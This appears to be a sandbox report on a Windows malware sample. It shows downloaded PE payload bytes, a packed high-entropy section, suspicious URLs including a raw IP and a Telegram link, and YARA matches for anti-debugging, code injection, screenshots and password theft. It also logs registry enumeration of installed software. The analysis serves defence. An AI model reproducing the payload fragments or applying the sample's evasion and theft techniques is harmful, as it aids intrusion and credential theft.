InternetReadFile March 12, 2023, 11:03 a.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $/saKN2KN2KN2U2kN2U2PN2U21N2lf2LN2KN27N2U2JN2U2JN2U2JN2RichKN2PEL+lfaà &îH@@@1Z+P À ¸ð¸(@¨.textô$& `.dataT1@@À.rsrcÀ >@@.reloc Þ@B°0- -¸-Î-Ü-ö- ..2.D.V.j...®.º.Ð.à.ò.///</L/d/t///¢/®/¼/Ê/Þ/ð/þ/0$040J0æ4Ö4À4\|-Î0à0ø01$181T1r1111¨1¸1Î1ä1þ122<2T2b2n2\|222¬2Ä2Ò2à2ì233,3F3X3d3n3z33¢3®3Ö3â3ð3444<4N4^4p444¢4°40x0h00AK@.O@z@Ý@Ý¢@Wf@Ð$AßO@íéc))ð?ð?33ÿð?ð?33ð¿0Cÿððÿà ÿÀÀÿÊòIqÊòIñ`B¢ `B¢YóøÂn¥YóøÂn¥tancossinmodffloorceilatanexp10ð?acosasinloglog10exppow(null)(null)EEE50P( 8PX700WP `h````xpxxxxÿÿÿÿÿÿïÀ@ðCorExitProcessmscoree.dllruntime error TLOSS error SING error DOMAIN error R6034 An application has made an attempt to load the C runtime library incorrectly. Please contact the application's support team for more information. R6033 - Attempt to use MSIL code from this assembly during native code initialization This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. R6032 - not enough space for locale information R6031 - Attempt to initialize the CRT more than once. This indicates a bug in your application. R6030 - CRT not initialized R6028 - unable to initialize heap R6027 - not enough space for lowio initialization R6026 - not enough space for stdio initialization R6025 - pure virtual function call R6024 - not enough space for _onexit/atexit table R6019 - unable to open console device R6018 - unexpected heap error R6017 - unexpected multithread lock error R6016 - not enough space for thread data This application has requested the Runtime to terminate it in an unusual way. Please contact the application's support team for more information. R6009 - not enough space for environment R6008 - not enough space for arguments R6002 - floating point support not loaded Microsoft Visual C++ Runtime Library ...<program name unknown>Runtime Error! Program: ÀÀÀÀÀÀÀÀÀÀEncodePointerKERNEL32.DLLDecodePointerFlsFreeFlsSetValueFlsGetValueFlsAllocÉy@hy@hy@_nextafter_logb_yn_y1_y0frexpfmod_hypot_cabsldexpfabssqrtatan2tanhcoshsinh !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnop request_handle: 0x00cc0010	1	1	0
InternetReadFile March 12, 2023, 11:03 a.m.	buffer: MZÿÿ¸@Ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $±Àõï®Ïõï®Ïõï®Ï®¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPEL¼aàú0@`@¼:<P,Ð9800.text« `.rdataÞ0@@.data`@@À.reloc,P"@BUììh(6@ÿ0@EüÀTSV50@WhD6@PÿÖhT6@£@@ÿÐhl6@Eøÿ@@h6@Eðÿ@@h6@Øÿ@@h¬6@øÿ@@h6@Eôÿ@@hÄ6@ÿuüÿÖuühÔ6@V£8@@ÿÐhè6@V£@@ÿ8@@hü6@V£D@@ÿ8@@h7@V£$@@ÿ8@@h7@V£<@@ÿ8@@h 7@V£@@ÿ8@@h07@V£4@@ÿ8@@h<7@V£@@ÿ8@@hH7@V£0@@ÿ8@@uøhT7@V£ @@ÿ8@@h\7@V£@@ÿ8@@hd7@V£T@@ÿ8@@hp7@Vÿ8@@h\|7@Vÿ8@@h7@W£X@@ÿ8@@}üh 7@Wÿ8@@h¬7@Wÿ8@@h¼7@Wÿ8@@hÌ7@W£@@@ÿ8@@hÜ7@S£,@@ÿ8@@hð7@Vÿ8@@uôhü7@V£@@ÿ8@@]ðh8@Sÿ8@@h8@S£(@@ÿ8@@h8@Sÿ8@@h$8@V£@@ÿ8@@h48@V£H@@ÿ8@@hH8@V£\@@ÿ8@@hX8@V£@@ÿ8@@hl8@V£P@@ÿ8@@_^£L@@[ÉÃUììðûÿÿVhP3öVÿ@@øýÿÿPVVjVÿ(0@Àxfh\|8@øýÿÿPÿ@@øýÿÿPÿX@@ÀuVøýÿÿPÿD@@h¤8@øýÿÿPÿ@@øýÿÿPðûÿÿPÿT@@Àtøýÿÿè,^ÉÃVøýÿÿPðûÿÿPÿ0@øýÿÿè jÿÿ0@ÌUììXSVWjD_W3ÛE¨SPñÿ(@@jEì}¨SPÿ(@@Ähj@ÿ@@ºÀ8@EüMüè º9@Müè º09@Müèt ÖMüèj º@9@Müè] }üEìPE¨PSShSSSWhH9@ÿ0@ÀuÿtWÿ0@@3Àë)jÿÿuìÿ0@ÿuì50@ÿÖÿuðÿÖÿtWÿ0@@3À@_^[ÉÃUì3ÀÒtúÿÿÿv¸WÀxHÒt+VW}¾þÿÿ+ò+ùÀt·fÀtfÁêuå_^ÒAþEÁ3ÉÒf¸zEÁë Òt3Òf]ÂUìQSVWjl[òùj1Xf9¤Vÿ @@ø"j0Vÿ@@ÀjOVÿ@@ÀuvjIVÿ@@ÀuiSVÿ@@Àu]Vÿ7ÿT@@ØÛtKÓ+ÑúRèºP0@YMüEüèýVÿ @@MüCèë?tÿ7ÿ 0@Eü3À@éjl[j3Xf9ufVÿ @@ø"uZj0Vÿ@@ÀuMjOVÿ@@Àu@jIVÿ@@Àu3SVÿ@@Àu'Vÿ7ÿT@@ØÛtÓ+ÑúRèàº0@éWÿÿÿVÿ @@jcYjb[øu[f9uVf9NuPj1Xf9FuGjO^Sÿ@@Àu4jISÿ@@Àu'Vÿ7ÿT@@ØÛtÓ+ÑúRèvºà0@éíþÿÿjb[Vÿ @@øu^f9uYf~nuRf9^uLj1^Xf9uAjOSÿ@@Àu4jISÿ@@Àu'Vÿ7ÿT@@ØÛtÓ+ÑúRè ºÐ5@éþÿÿf>LuiVÿ @@ø"u]j0Vÿ@@ÀuPjOVÿ@@ÀuCjIVÿ@@jl[Àu6SVÿ@@ÀuVÿ7ÿT@@ØÛtÓ+ÑúRèº81@éþÿÿjl[f>MufVÿ @@ø"uZj0Vÿ@@ÀuMjOVÿ@@Àu@jIVÿ@@Àu3SVÿ@@Àu'Vÿ7ÿT@@ØÛtÓ+ÑúRè+º1@é¢ýÿÿVÿ @@jtYø+ucjlXf9u[f9NuUjcXf9FuLj1^Xf9uAjOSÿ@@Àu4jISÿ@@Àu'Vÿ7ÿT@@ØÛtÓ+ÑúRè¹ºÈ1@é0ýÿÿÎèèÀt'Vÿ7ÿT@@ØÛtÓ+ÑúRèº 2@éþüÿÿÎè{Àt'Vÿ7ÿT@@ØÛtÓ+ÑúRèUºx2@éÌüÿÿÎèðÀt'Vÿ7ÿT@@ØÛtÓ+ÑúRè#º83@éüÿÿÎèYÀt'Vÿ7ÿT@@ØÛtÓ+ÑúRèñºø3@éhüÿÿVÿ @@øguLf>auFjdXf9Fu=f9Fu7f~ru0j1Xf9Fu'Vÿ7ÿT@@ØÛtÓ+ÑúRèº@4@éüÿÿVÿ @@ø;uqf>Aukf~eudf~2u]j0Vÿ@@ÀuPjOVÿ@@ÀuCjIVÿ@@Àu6jlXPVÿ@@Àu'Vÿ7ÿT@@ØÛtÓ+ÑúRèº5@éûÿÿVÿ @@jt[ø#unf9uij1Xf9Fu`j0Vÿ@@ÀuSjOVÿ@@ÀuFjIVÿ@@Àu9jlXPVÿ@@ÀuVÿ7ÿT@@ØÛtÓ+ÑúRè¢º5@éûÿÿjt[Vÿ @@ø#uSf9uNj3Xf9FuEj0Vÿ@@Àu8jOVÿ@@Àu+jIVÿ@@ÀujlXPVÿ@@ÀuVÿ7ÿT@@ØÛu3À_^[ÉÃSVW4UùVjÿ$@@VØWSÿ@@Pÿ@@ÄSÿ4@@jÿH@@Àt ÿ@@Sj ÿP@@ÿL@@Sÿ<@@3ÀëÈÿ_^[ÃV3öVÿH@@ÀtWj ÿ\@@øÿtWÿ@@ðötWÿ4@@ÿL@@_Æ^ÃUììSVWèøôÿÿh00@jjÿ@@@ÿ,@@=·ujÿ0@èA÷ÿÿ}èèÿÿÿ3ÛEüÀPÿ @@p6Pj@Eèÿ@@ÿuüÖEøÈèªøÿÿMü3ö!]ô·ÐfÀ¹Mð·ÂEì·Âø tCº f;Ât9ø t4ø t/ø tEì·ÀÛuÿuèj@ÿ@@MüøEðC3ö·fwFë$Ût 3ÀMø×fw3ÛèøÿÿÿtWÿ0@@MüEô@ request_handle: 0x00cc0010	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00092600', u'virtual_address': u'0x00021000', u'entropy': 7.993242925132534, u'name': u'.data', u'virtual_size': u'0x001d3e44'}

entropy

7.99324292513

description

A section with a high entropy has been found

entropy

0.752570694087

description

Overall entropy of this PE file is high

Potentially malicious URLs were found in the process memory dump (4 events)

url	http://www.openssl.org/support/faq.html
url	http://65.109.12.165:80
url	https://t.me/nemesisgrow
url	https://steamcommunity.com/profiles/76561199471222742

Yara rule detected in process memory (50 out of 60 events)

description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Take ScreenShot	rule	ScreenShot
description	Communications use DNS	rule	Network_DNS
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Take ScreenShot	rule	ScreenShot
description	Communications use DNS	rule	Network_DNS
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection

Queries for potentially installed applications (50 out of 51 events)

Time & API	Arguments	Status
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
